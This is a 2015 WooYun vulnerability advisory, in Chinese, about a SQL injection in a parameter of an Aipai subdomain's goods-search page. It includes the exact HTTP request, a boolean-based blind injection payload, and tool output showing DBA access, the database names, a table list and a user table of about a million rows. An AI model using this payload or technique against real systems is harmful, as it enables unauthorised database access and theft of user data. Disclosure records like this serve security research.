当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117904

漏洞标题:爱拍某重要站点SQL注射泄露百万用户信息DBA权限

相关厂商:爱拍

漏洞作者: 紫霞仙子

提交时间:2015-06-03 10:17

修复时间:2015-07-18 16:42

公开时间:2015-07-18 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

233

详细说明:

表太多了,好多user,好多order
GET /buy_goods/search?areaId=&by=&cspfFlag=1&gameId=289&orderBy=2&pageRecords=10&serverId=&teamId=&tradeId=0&typeId=&typeIdHidden=0&whpfFlag=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yxcz.aipai.com
Cookie: ***********
Host: yxcz.aipai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

漏洞证明:

---
Parameter: orderBy (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: areaId=&by=&cspfFlag=1&gameId=289&orderBy=-4403 OR 9522=9522&pageRecords=10&serverId=&teamId=&tradeId=0&typeId=&typeIdHidden=0&whpfFlag=1
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5
current user: 'i3yx_business@117.34.5.6'
current user is DBA: True
available databases [13]:
[*] db_fornalanweb
[*] db_fornalanweb_bak
[*] i3yx_core_db
[*] i3yx_core_db_bak
[*] i3yx_core_db_month
[*] i3yx_core_db_year
[*] i3yx_core_history
[*] i3yx_message
[*] i3yx_mobile_db
[*] i3yx_safety_db
[*] information_schema
[*] mysql
[*] test
Database: i3yx_core_db
[303 tables]
+-----------------------------------------+
| activity_aucsio_more_concession |
| api_fetch_sale_confg |
| appr_apprae |
| baePoods_atribute_vs_trade_type |
| base_gamePareer |
| di_goods_type_big_vs_trade_ype |
| dl_user_game^path |
| ssistant_zw_account |
| use_ihfo_appd |
| user_user_login_banchg |
| wow_goods_tyne\\rehation |
| activity_auction |
| activity_auction_base_config |
| activity_auction_base_config_session |
| activity_auction_dl_order |
| activity_auction_visit_record |
| activity_signing_star |
| activity_star_games |
| activity_star_news |
| ago_account_dgh_info |
| ago_account_own |
| ago_articles |
| ago_goods |
| ago_goods_append_info |
| ago_goods_market |
| ago_order_assess |
| ago_order_bf_apply |
| ago_order_change_person |
| ago_order_conversion_apply |
| ago_order_deal_record |
| ago_orders |
| ago_user_accounts |
| ago_user_roles |
| api_fetch_sale_config_user |
| api_fetch_sale_game_data |
| api_game_base_relation |
| api_goods_relation |
| api_oa_role_config |
| api_phone_message |
| api_phone_message_logs |
| api_tasks |
| api_tasks_log |
| api_user_config |
| api_user_config_detail |
| api_user_trust_ip_detail |
| app_version |
| appr_attr_config |
| appr_count |
| appr_credit |
| appr_rank_config |
| assistant_answer |
| b@se_game_way |
| base_account_atribute_config |
| base_account_atribute_vs_trade_type |
| base_account_config_dgh |
| base_account_email |
| base_account_type |
| base_activity |
| base_advert_aipai |
| base_alarm_record |
| base_arda |
| base_atribute_config_detail |
| base_attach_info |
| base_auto_audit_config |
| base_auto_audit_detail |
| dl_orders |
| dl_orders_discuss
。。。。。。。。。
好多user表,这个就100万
Database: i3yx_core_db
+-----------+---------+
| Table | Entries |
+-----------+---------+
| user_user | 1056517 |
+-----------+---------+

修复方案:

~~~~~~~~~~~~~~·

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-03 16:40

厂商回复:

多谢反馈,这是挂在爱拍二级域名的合作方的数据库,已告知合作方。

最新状态:

暂无